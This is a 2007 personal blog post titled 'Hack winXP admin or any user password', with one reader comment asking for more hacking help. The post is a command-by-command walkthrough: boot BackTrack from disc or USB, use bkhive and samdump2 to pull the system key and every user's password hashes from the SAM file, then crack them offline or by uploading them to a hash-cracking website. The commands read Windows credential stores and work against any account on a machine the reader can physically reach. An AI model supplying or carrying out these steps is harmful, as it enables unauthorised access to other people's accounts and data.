Anils blog

Hack winXP admin or any user password

Posted by anil soni on March 14, 2007

This tutorial shows how to recover a Windows XP user password if you have physical access to the computer. Follow these steps:

  1. Download the BackTrack ISO image from http://mirror.switch.ch/ftp/mirror/backtrack/bt2final.iso (~700MB)
  2. After the download is complete, you can either burn it to a disc or create a bootable pen drive. To create a bootable pen drive, mount the image on your favourite virtual drive (Alcohol 120%, CloneCD, VirtualCD) and from the command prompt type
    g:\make_disc.bat k:
    Here I am assuming g: is your virtual CD-ROM drive letter and k: is your pen drive letter.
  3. Now your bootable media is ready. Boot the system from it. To do this, change the first boot device in the BIOS to CDROM if you burned a disc, or to USB-HDD or USB-FDD if you are using a pen drive.
  4. Once the BackTrack KDE desktop has loaded, open the console and type
    bkhive /mnt/hda1/WINDOWS/system32/config/system /mnt/hda1/keyfile
    Here /mnt/hda1 is your c:\, and I am assuming that your c:\ is FAT32 formatted and not NTFS; otherwise you have to find one such partition for the keyfile using the mount command. If you are using a pen drive, don't worry about the filesystem; simply use this command
    bkhive /mnt/hda1/WINDOWS/system32/config/system keyfile

    bkhive extracts the system key, which is used to remove the extra encryption from the SAM database.

  5. Now type another command, which dumps the password hashes from the SAM file
    samdump2 /mnt/hda1/WINDOWS/system32/config/SAM /mnt/hda1/keyfile > pwdumpfile.txt
    If you have a different location for the keyfile, use that location instead of /mnt/hda1/keyfile. Again, if you are using a pen drive, simply use this command
    samdump2 /mnt/hda1/WINDOWS/system32/config/SAM keyfile > pwdumpfile.txt
  6. Final step. In the previous step we dumped the passwords of all users into pwdumpfile.txt. These passwords are still not readable because they are stored as LM hashes. To reverse these LM hashes, either use SAMinside, which will crack the password for you using a brute-force or dictionary attack, or submit your hashes at www.plain-text.info (simple and fast, preferred).
  7. Source: see the video version at Irongeek: http://www.irongeek.com/i.php?page=videos/backtrackplaintext


One Response to “Hack winXP admin or any user password”

  1. abhishek said

    Sir, can you tell me any other site for free download of the BackTrack, please?
    Because here there occurs a problem or error when opening the page.
    Sir, please help me.
    And sir, can you tell me many more things about hacking, because I want to be a hacker. Sir, please reply, please help me, and there is no guide here to help me. So please help me.
    Sir, my Gmail ID is abhishek.abhi59@gmail.com
